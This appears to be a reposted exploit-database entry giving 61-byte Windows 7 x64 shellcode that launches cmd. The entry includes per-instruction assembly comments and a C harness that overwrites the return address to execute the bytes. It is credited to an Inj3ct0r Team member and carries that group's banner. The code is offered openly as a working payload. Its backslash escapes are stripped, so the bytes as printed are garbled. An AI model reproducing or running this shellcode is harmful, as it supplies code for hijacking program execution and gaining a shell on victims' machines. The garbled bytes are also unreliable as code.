Windows Seven x64 (cmd) Shellcode 61 Bytes

/*
| Title: windows Seven x64 (cmd) Shellcode 61 Bytes
| Type: Shellcode
| Author: agix
| Platform: win32
| Info: Tested on Windows Seven Pro Fr, Ultimate En, Premium Home En
*/
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ################################## 1
0 I’m agix member from Inj3ct0r Team 1
1 ################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#include

char shellcode[] =

“x31xC9” //xor ecx,ecx
“x64x8Bx71x30” //mov esi,[fs:ecx+0x30]
“x8Bx76x0C” //mov esi,[esi+0xc]
“x8Bx76x1C” //mov esi,[esi+0x1c]
“x8Bx36” //mov esi,[esi]
“x8Bx06” //mov eax,[esi]
“x8Bx68x08” //mov ebp,[eax+0x8]
“xEBx20” //jmp short 0x35
“x5B” //pop ebx
“x53” //push ebx
“x55” //push ebp
“x5B” //pop ebx
“x81xEBx11x11x11x11” //sub ebx,0x11111111
“x81xC3xDAx3Fx1Ax11” //add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
“xFFxD3” //call ebx
“x81xC3x11x11x11x11” //add ebx,0x11111111
“x81xEBx8CxCCx18x11” //sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
“xFFxD3” //call ebx
“xE8xDBxFFxFFxFF” //call dword 0x15
//db “cmd”
“x63x6dx64”;

int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}

发表评论?

0 条评论。

发表评论